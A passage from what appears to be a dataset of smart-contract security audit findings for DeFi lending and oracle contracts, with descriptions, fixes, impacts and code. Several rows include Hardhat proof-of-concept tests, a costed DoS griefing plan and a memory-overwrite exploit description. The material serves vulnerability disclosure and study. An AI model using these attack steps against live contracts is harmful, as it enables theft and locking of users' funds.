This will lead to the situation that the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the repayment of the user is sandwiched (frontrunned), the profit of the repayer is decreased till the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits(""0.06"", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: ethers.utils.parseUnits(""100"", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log(""Swap success"");\\n\\n let paramsRep: 
LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after repay: BigNumber { value: ""993951415"" }\\n// Balance of sale token after repay: BigNumber { value: ""99005137946252426108"" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: ""993951415"" }\\n// Balance of sale token after repay: BigNumber { value: ""99000233164653177505"" }\\n```\\n\\nThe following table shows difference of recieved sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 weis, which is at the current market price of around 8 USD. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.","To address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. 
Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.",The absence of slippage protection results in potential profit loss for the repayer.,"```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n" +DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arrays,medium,"`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? 
tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000` so the minimum borrow is $0.1 dollars since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.9 dollars. The cost to add one key to the array is approx. $4. The max block gas limit on ethereum mainnet is `30,000,000`, so divide that by 2000 gas, the approximate gas increase for one key added to the array. The result is 15,000, therefore the attacker can spend 60000 dollars to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. 
Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. Default daily rate is .1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.5 dollars, and the attacker spends another $0.5 dollars to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000 dollars. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the loaner's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.","`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. 
Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.",Array packing causes users to spend more gas on loans of the affected LP token. User transactions may out-of-gas revert due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time for asymmetric cost favoring the attacker. The LP will earn very little fees over the period of the DoS.,"```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n" +Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly lack of overflow protection,medium,"`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. 
Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of the memory they choose by selectively overflowing to make it write to the desired position.\\nAs shown above, overwriting the function selector is possible although most of the time this value would be a complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a work around. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. This allows the attacker to selectively overwrite the function selector with any value they chose. 
This bypasses function selectors restrictions and opens calls to dangerous functions.","Limit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.",Attacker can bypass function restrictions and call dangerous/unintended functions,"```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n" +Blacklisted creditor can block all repayment besides emergency closure,medium,"```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe following code is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.","Create an escrow to hold funds in the event that the creditor cannot receive their funds. Implement a try-catch block around the transfer to the creditor. 
If it fails then send the funds instead to an escrow account, allowing the creditor to claim their tokens later and for the transaction to complete.",Borrowers with blacklisted creditors are forced to default,"```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n" +Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflow,medium,"This calculation is most likely to underflow\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\nThe `cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and tokens transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo in case when liquidity of a position is in the current tick range, both tokens would be transferred to the contract and saleToken would be swapped for holdToken and then added to `cache.holdTokenBalance`. This would make `cache.holdTokenBalance > cache.borrowedAmount` since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped` and would make the tx revert due to underflow.",The borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\n,Many positions would be unavailable to borrowers. 
For non-volatile positions like that which provide liquidity to stablecoin pools the DoS could last for very long period. For volatile positions that provide liquidity in a wide range this could also be for more than 1 year.,```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n +Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflow,medium,"Because the `repay()` function resets the `dailyRateCollateralBalance` to 0 when the lender call didn't fully close the position. We want to be able to compute the missing collateral again.\\nTo do so we substract the percentage of collateral not paid to the `accLoanRatePerSeconds` so on the next call we will be adding extra second of fees that will allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute a percentage using the borrowed amount left instead of the initial borrow amount causing the percentage to be higher. In practice this do allows the contract to recompute the missing collateral.\\nBut in the case of the missing `collateralBalance` or `removedAmt` being very high (ex: multiple days not paid or the loan removed was most of the position's liquidity) we might end up with a percentage higher than the `accLoanRatePerSeconds` which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get his tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit(""Updated accRate is incorrect"", async () => {\\n const amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n 
];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n","Consider that when a lender do an emergency liquidity restoration they give up on their collateral missing and so use the initial amount in the computation instead of borrowed amount left.\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\n",Medium. 
Lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if he want his liquidity back.,"```\\nit(""Updated accRate is incorrect"", async () => {\\n const amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n" +Borrower collateral that they are owed can get stuck in Vault and not sent back to them after calling `repay`,medium,"First, let's say that a borrower 
called `borrow` in `LiquidityBorrowingManager`. Then, they call increase `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to `repay` so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not. It makes sense the second part is not fine because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). 
We later do:\n```\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\n```\n\nSo clearly the user will not receive their collateral back.","You should separate:\n```\n if (\n collateralBalance > 0 &&\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\n Constants.MINIMUM_AMOUNT\n ) {\n liquidationBonus +=\n uint256(collateralBalance) /\n Constants.COLLATERAL_BALANCE_PRECISION;\n } else {\n currentFees = borrowing.dailyRateCollateralBalance;\n }\n```\n\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.",User's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.,```\n if (\n collateralBalance > 0 &&\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\n Constants.MINIMUM_AMOUNT\n ) {\n liquidationBonus +=\n uint256(collateralBalance) /\n Constants.COLLATERAL_BALANCE_PRECISION;\n } else {\n currentFees = borrowing.dailyRateCollateralBalance;\n }\n```\n +commitRequested() front-run malicious invalid oracle,medium,"Execution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\n```\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\n public\n payable\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, """")\n {\n// rest of code\n\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\n lastCommittedPublishTime = pythPrice.publishTime;\n// rest of code\n```\n\n`commit()` has a 
similar limitation and can set `lastCommittedPublishTime`.\n```\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\n if (\n versionList.length > versionIndex && // must be a requested version\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\n ) {\n commitRequested(versionIndex, updateData);\n return;\n }\n// rest of code\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\n lastCommittedPublishTime = pythPrice.publishTime;\n// rest of code.\n```\n\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. In order to satisfy the `commit()` constraint, we need to pass a `commit()` parameter set as follows:\nversionIndex= nextVersionIndexToCommit\noracleVersion = versionList[versionIndex] - 1 and oracleVersion > _latestVersion\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\nThis way `lastCommittedPublishTime` will be modified, causing `commitRequested()` to execute with `revert PythOracleNonIncreasingPublishTimes`\nExample: Given: nextVersionIndexToCommit = 10 versionList[10] = 200\n_latestVersion = 100\nwhen:\nkeeper execute commitRequested(versionIndex = 10 , VAA{ publishTime = 205})\nfront-run execute `commit(versionIndex = 10 , oracleVersion = 200-1 , VAA{ publishTime = 205})\nversionIndex= nextVersionIndexToCommit (pass)\noracleVersion = versionList[versionIndex] - 1 and oracleVersion > _latestVersion (pass)\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\nBy the time the `keeper` submits the next VAA, the price may have passed its expiration date","check `pythPrice` whether valid for `nextVersionIndexToCommit`\n```\n function commit(uint256 
versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n // Must be before the next requested version to commit, if it exists\\n // Otherwise, try to commit it as the next request version to commit\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\\n\\n // Price must be more recent than that of the most recently committed version\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n\\n // Oracle version must be more recent than that of the most recently committed version\\n uint256 minVersion = _latestVersion;\\n uint256 maxVersion = versionList.length > versionIndex ? 
versionList[versionIndex] : current();\n\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] // Add the line below\n GRACE_PERIOD)\n revert PythOracleGracePeriodHasNotExpiredError();\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\n// Add the line below\n if (nextVersionIndexToCommit < versionList.length) {\n// Add the line below\n if (\n// Add the line below\n pythPrice.publishTime >= versionList[nextVersionIndexToCommit] // Add the line below\n MIN_VALID_TIME_AFTER_VERSION &&\n// Add the line below\n pythPrice.publishTime <= versionList[nextVersionIndexToCommit] // Add the line below\n MAX_VALID_TIME_AFTER_VERSION\n// Add the line below\n ) revert PythOracleUpdateValidForPreviousVersionError();\n// Add the line below\n }\n\n\n _recordPrice(oracleVersion, pythPrice);\n nextVersionIndexToCommit = versionIndex;\n _latestVersion = oracleVersion;\n }\n```\n","If the user can control the oracle invalidation, it can lead to many problems e.g. 
invalidating the `oracle` to one's own detriment, not having to take losses, maliciously destroying other people's profits, etc.","```\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\n public\n payable\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, """")\n {\n// rest of code\n\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\n lastCommittedPublishTime = pythPrice.publishTime;\n// rest of code\n```\n" +"`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay smaller keeper fee than necessary",medium,"`Vault._update(user, 0, 0, 0)` will pass all invariant checks:\n```\n// invariant\n// @audit operator - pass\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\n revert VaultNotOperatorError();\n// @audit 0,0,0 is single-sided - pass\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\n revert VaultNotSingleSidedError();\n// @audit depositAssets == 0 - pass\nif (depositAssets.gt(_maxDeposit(context)))\n revert VaultDepositLimitExceededError();\n// @audit redeemShares == 0 - pass\nif (redeemShares.gt(_maxRedeem(context)))\n revert VaultRedemptionLimitExceededError();\n// @audit depositAssets == 0 - pass\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\n revert VaultInsufficientMinimumError();\n// @audit redeemShares == 0 - pass\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\n revert VaultInsufficientMinimumError();\n// @audit since this will be called by **different** users in the same epoch, this will also pass\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\n```\n\nIt then calculates amount to claim by calling _socialize:\n```\n// asses socialization and settlement fee\nUFixed6 
claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert (underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. 
So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? 
